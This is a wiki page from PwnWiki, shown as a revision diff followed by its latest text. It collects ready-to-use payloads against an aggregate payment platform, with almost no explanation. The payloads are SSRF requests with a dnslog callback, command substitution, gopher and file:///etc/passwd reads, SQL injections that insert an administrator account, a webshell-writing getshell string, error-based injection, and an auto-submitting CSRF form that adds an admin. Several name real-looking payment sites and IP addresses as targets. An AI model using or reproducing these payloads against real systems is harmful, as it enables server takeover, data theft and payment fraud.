Difference between revisions of "全版本聚合支付漏洞"
From PwnWiki
| (2 intermediate revisions by the same user not shown) | |||
| Line 1: | Line 1: | ||
| + | {| style="margin: auto; width: 750px;" | ||
| + | | style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" | | ||
| + | {| cellspacing="2px" | ||
| + | | valign="middle" | [[Image:Warn1.png|50px]] | ||
| + | | 這個頁面存在爭議,因此頁面內容存在不確定性。</span> | ||
| + | |} | ||
| + | |} | ||
| + | <br><noinclude> | ||
| + | |||
==Vul== | ==Vul== | ||
| − | + | <pre> | |
http://47.104.233.93/Payment_Index_batchQuery | http://47.104.233.93/Payment_Index_batchQuery | ||
| − | + | </pre> | |
==SSRF== | ==SSRF== | ||
| + | <pre> | ||
http://api3.e-shion996.com/Payment_MGZF_PaymentQuery?data[orderid]=123&config[query_gateway]=http://o7xva.l.dnslog.io&config[mch_id]=123 | http://api3.e-shion996.com/Payment_MGZF_PaymentQuery?data[orderid]=123&config[query_gateway]=http://o7xva.l.dnslog.io&config[mch_id]=123 | ||
o7xva.l.dnslog.io/`file` | o7xva.l.dnslog.io/`file` | ||
| Line 18: | Line 28: | ||
| − | + | </pre> | |
==SQL注入添加管理員用戶== | ==SQL注入添加管理員用戶== | ||
| + | <pre> | ||
index.php?m=Pay&c=Alipage&a=callbackurl&out_trade_no[0]=exp&out_trade_no[1]==20190722230646541015;insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27801%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);--+ | index.php?m=Pay&c=Alipage&a=callbackurl&out_trade_no[0]=exp&out_trade_no[1]==20190722230646541015;insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27801%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);--+ | ||
| + | </pre> | ||
| − | + | ==SQL注入(需要代理賬戶)== | |
| − | == | + | <pre> |
| − | |||
index.php?m=user&c=IntoPieces&a=ajaxGetIndustry | index.php?m=user&c=IntoPieces&a=ajaxGetIndustry | ||
DATA: | DATA: | ||
| Line 36: | Line 47: | ||
http://vip.qhkjpay.cn/conn.php | http://vip.qhkjpay.cn/conn.php | ||
| − | + | </pre> | |
| − | |||
==SQL注入(payload和上面相同)== | ==SQL注入(payload和上面相同)== | ||
| + | <pre> | ||
index.php?m=user&c=api&a=ajaxGetIndustry | index.php?m=user&c=api&a=ajaxGetIndustry | ||
| − | + | </pre> | |
==后台Getshell== | ==后台Getshell== | ||
| − | manage_System_base.html | + | <pre> |
| + | manage_System_base.html | ||
',@copy($_REQUEST[x],$_REQUEST[c]),// | ',@copy($_REQUEST[x],$_REQUEST[c]),// | ||
| − | + | </pre> | |
==SQL報錯注入(API支付)== | ==SQL報錯注入(API支付)== | ||
| + | <pre> | ||
Pay_Pay_getSignkey?code=123*&merid=222 | Pay_Pay_getSignkey?code=123*&merid=222 | ||
| − | + | </pre> | |
| − | |||
| − | |||
==CSRF添加管理員== | ==CSRF添加管理員== | ||
| − | < | + | <pre> |
| − | <html lang="en" | + | <html lang="en"> |
| − | <body onload="document.forms[0].submit();" | + | <body onload="document.forms[0].submit();"> |
| − | <form | + | <form id="form1" name="form1" action="http://127.0.0.1:93/index.php/luck_Admin_addAdmin.html" method="post"> |
| − | <input type="hidden" name="username" value="ok179" | + | <input type="hidden" name="username" value="ok179"> |
| − | <input type="hidden" name="password" value="test123" | + | <input type="hidden" name="password" value="test123"> |
| − | <input type="hidden" name="reppassword" value="test123" | + | <input type="hidden" name="reppassword" value="test123"> |
| − | <input type="hidden" name="groupid" value="1" | + | <input type="hidden" name="groupid" value="1"> |
| − | </body | + | </body> |
| − | </html> | + | </html> |
| − | </ | + | </pre> |
Latest revision as of 19:47, 5 April 2021
|
Vul
http://47.104.233.93/Payment_Index_batchQuery
SSRF
http://api3.e-shion996.com/Payment_MGZF_PaymentQuery?data[orderid]=123&config[query_gateway]=http://o7xva.l.dnslog.io&config[mch_id]=123 o7xva.l.dnslog.io/`file` gopher://192.168.220.139:80/_POST%20/test/ssrf/post.php%20HTTP/1.1%250d%250aHost:%20192.168.220.139%250d%250aUser-Agent:%20curl/7.42.0%250d%250aAccept:%20*/*%250d%250aContent-Type:%20application/x-www-form-urlencoded%250d%250a%250d%250acmd=bbbbb file:///etc/passwdhttp://example.com/ssrf.php?url=file:///C:/Windows/win.ini
SQL注入添加管理員用戶
index.php?m=Pay&c=Alipage&a=callbackurl&out_trade_no[0]=exp&out_trade_no[1]==20190722230646541015;insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27801%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);--+
SQL注入(需要代理賬戶)
index.php?m=user&c=IntoPieces&a=ajaxGetIndustry
DATA:
id=123&name=_log ; insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27101%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);--+
insert into pay_admin (`id`,`username`,`password`,`groupid`) values ('101','ok','7aa5e695be95cdd64a88410a64dfe2c1','1');--+
http://vip.qhkjpay.cn/conn.php
SQL注入(payload和上面相同)
index.php?m=user&c=api&a=ajaxGetIndustry
后台Getshell
manage_System_base.html ',@copy($_REQUEST[x],$_REQUEST[c]),//
SQL報錯注入(API支付)
Pay_Pay_getSignkey?code=123*&merid=222
CSRF添加管理員
<html lang="en"> <body onload="document.forms[0].submit();"> <form id="form1" name="form1" action="http://127.0.0.1:93/index.php/luck_Admin_addAdmin.html" method="post"> <input type="hidden" name="username" value="ok179"> <input type="hidden" name="password" value="test123"> <input type="hidden" name="reppassword" value="test123"> <input type="hidden" name="groupid" value="1"> </body> </html>
